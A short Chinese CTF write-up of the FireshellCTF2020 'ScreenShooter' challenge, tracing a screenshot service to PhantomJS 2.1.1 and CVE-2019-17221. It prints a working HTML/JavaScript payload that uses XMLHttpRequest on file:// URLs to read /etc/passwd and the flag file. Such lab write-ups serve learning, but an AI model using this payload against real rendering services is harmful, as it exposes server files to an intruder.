日常学习玩一道题,挺有意思的记录下来。

[FireshellCTF2020]ScreenShooter

buu上面随便翻得五分题,打开之后这个样子:
image-20211215172352825

然后点击screenshot真的会截图:

image-20211215172512326

查看抓包信息:
image-20211215172635943

没啥有用的。

没发现什么有用的,只能尝试找到这个http请求中的内容了。

尝试向自己vps上面请求,然后查看日志内容:
image-20211215173117277

发现请求中有关键字眼:PhantomJS/2.1.1

应该就是提示了。百度相关漏洞。

没有搜到。。然后在阿里云漏洞库获取到CVE编号为:CVE-2019-17221

然后。。github上面找到了仅存的pdf写的漏洞利用详情,

image-20211215174855369

利用思路就是vps上面放一个恶意html文件然后让他访问触发file协议读取/etc/passwd文件,试试:

<!DOCTYPE html>
<html>
<head>
    <title></title>
</head>
<body>
    <script type="text/javascript">
        var exp;
        exp = new XMLHttpRequest;
        exp.onload = function(){
            document.write(this.responseText)
        };
        exp.open("GET","file:///etc/passwd");
        exp.send();
    </script>
</body>
</html>

image-20211215174341038

hhhh快乐。然后尝试读flag。一般在根目录下改一行:

exp.open("GET","file:///flag");